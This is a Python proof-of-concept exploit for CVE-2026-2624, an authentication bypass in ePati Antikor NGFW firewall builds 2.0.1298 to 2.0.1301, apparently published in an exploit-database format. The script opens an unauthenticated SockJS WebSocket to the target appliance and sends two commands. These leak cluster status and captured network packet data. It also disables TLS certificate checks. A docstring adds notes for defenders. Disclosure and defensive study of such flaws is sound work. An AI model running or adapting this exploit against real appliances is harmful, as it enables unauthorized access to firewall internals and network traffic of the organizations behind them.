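# Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624
"""Proof of concept for CVE-2026-2624 (ePati Antikor NGFW, v.2.0.1298 - v.2.0.1301).

What the script shows: a SockJS WebSocket endpoint of the form
``/sock/<server_id>/<session_id>/websocket`` accepts a connection and answers
the commands ``rapor-dinle`` and ``paket-liste-dinle`` although the client
never presents credentials or a session token.

Notes for defenders, limited to what this file supports:

* Affected builds are the ones listed in the header. The script's own error
  text suggests v.2.0.1302 and later are fixed; confirm that against the
  vendor advisory before relying on it.
* The default port used here is 8800. Limiting which networks can reach that
  port reduces exposure until the appliance is upgraded.
* A useful log signal is a WebSocket upgrade to ``/sock/<id>/<id>/websocket``
  from a source with no authenticated management session, followed by the
  two commands named above.
"""

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time


def banner():
    """Print the tool banner to stdout."""
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)


def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection.

    The value is only a path component of the SockJS URL, not a secret, so
    the non-cryptographic ``random`` module is sufficient here.
    """
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))


def exploit(target_ip, target_port):
    """Connect to the SockJS WebSocket endpoint and request two data feeds.

    Args:
        target_ip: Host name or IP address of the appliance.
        target_port: TCP port of the web interface (the CLI default is 8800).

    The function prints whatever the server returns for each command. On any
    error it prints a message and terminates the process with exit status 1.
    The socket is closed on every path, including the error paths.
    """
    # SockJS URLs carry a server id and a session id chosen by the client.
    server_id = random.randint(100, 999)
    session_id = generate_random_id()

    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"

    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")

    try:
        # Certificate verification is disabled because the appliance is
        # expected to present a self-signed certificate. The peer is therefore
        # not authenticated: the responses printed below prove only that
        # *something* at this address answered.
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        try:
            ws.connect(ws_url)
            # No credentials or token were sent, so a completed handshake is
            # the evidence that the endpoint lacks an authentication check.
            print("[+] Connection Successful! (Authentication bypassed)\n")

            # Payload 1: Listening to Cluster and System Status
            payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
            print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
            ws.send(payload_1)

            # Wait for the response from the server
            time.sleep(1)
            response_1 = ws.recv()
            if response_1:
                print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
                print(f"> {response_1}\n")

            # Payload 2: Listening to Network Packets
            payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
            print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
            ws.send(payload_2)

            time.sleep(1)
            response_2 = ws.recv()
            if response_2:
                print("[+] Network packet data captured:")
                print(f"> {response_2}\n")

            print("[*] Exploitation complete. Closing connection.")
        finally:
            # Previously the socket was closed only after a fully successful
            # run; closing here also releases it when send/recv fails.
            ws.close()

    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)


if __name__ == "__main__":
    banner()

    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")

    args = parser.parse_args()

    exploit(args.target, args.port)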